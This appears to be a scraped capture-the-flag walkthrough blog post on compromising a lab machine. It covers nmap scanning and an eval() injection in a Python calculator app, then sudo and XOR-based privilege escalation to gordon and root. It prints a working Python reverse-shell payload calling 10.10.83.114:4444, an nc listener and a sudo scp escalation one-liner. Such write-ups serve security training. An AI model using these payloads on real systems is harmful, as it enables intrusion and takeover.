.png)
5 months ago
34 BOOK THIS SPACE FOR AD
ARTICLE ADNow let’s save all the required values and wordlists as constants on the shell. This speeds up your process and avoids confusion when typing complex commands.
You can also include this in a general .sh file so you can use it in other scenarios. Let us show you how to do it.
Create a new .sh file and type commands.
Authorize Executable: chmod +x general_constant_operation.sh
Just run it ./general_constant_operation.sh
Or just do it manually.
Now, using nmap, we need to know the enemy better and discover where we can infiltrate: nmap -sV -sC -oN nmap_result.txt -A -T4 --script=vuln $target_ip
Be patient. It will bring us good information.
SSH (22) is open and there is a list of vulnerabilities we can try on the current version.
We discovered an interesting application running on port 5000. Go there.
We have an application that performs mathematical operations. We can use SQLi methods using the input sections here. This is the first thing that comes to mind.
But it is always useful to examine the page a little more.
As you can see, we can download the source code of the current application. In such cases, you should always have the source code at hand.
Just download.
Examine the inside.
We now have 4 separate Python codes. We learned the native language of the mechanism.
Check out “app.py”. This constitutes the main code from which the composite structure is called.
There is “eval()” function in the code. This can be used for command injection. You can review it in detail here: https://book.hacktricks.xyz/generic-methodologies-and-resources/python/bypass-python-sandboxes
There are some examples under the title “Eval-ing python code”.
We should try this attack for “bisection” operation in practice.
Turn on Burp tool.
Change your browser settings.
Then connect to proxy.
We have the connection, now let’s look at the inputs of the operation we will try to attack. It should be “Intercept-ON”.
We saw the parameters we will send as BODY in the POST method.
Let’s add the following malicious entry:
__import__('os').system("bash -c 'bash -i >& /dev/tcp/10.10.83.114/4444 0>&1'")#Before sending this, listen to your machine on the port you specified: nc -nlvp 4444
Forward it now.
If that doesn’t work just give it as input.
We are inside. Try some commands.
Check sudo privilege: sudo -l
Stabilize reverse shell: python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
Then export TERM=xterm
Escalate it if possible:
TF=$(mktemp)echo 'sh 0<&2 1>&2' > $TF
chmod 777 "$TF"
sudo scp -S $TF x y:
It is not possible in this scenario, we do not have the sudo password.
Let’s examine the files for evidence.
Let’s use the information here and perform an operation on the .py file that we can run: sudo -u gordon /usr/bin/python3 /opt/encrypt.py
Let’s use a random value to explore the XOR operation and then perform some operations on https://gchq.github.io/CyberChef/.
We discovered logic now.
Now let’s try the same operation again with the value given to us.
We have everything. Escalate it.
Time to connect via SSH: ssh gordon@10.10.94.68
Try some commands.
We now have control of the machine in front of us.
Let’s look for any files that the “root” user owns but that also belongs to the group “gordon”: find / -user root -group gordon -ls 2>/dev/null
Let’s dive into “backups”.
Let’s go into “reports” and get the authorization.
Perform the following methods in order.
We won.
Bengali (Bangladesh) · 
English (United States) ·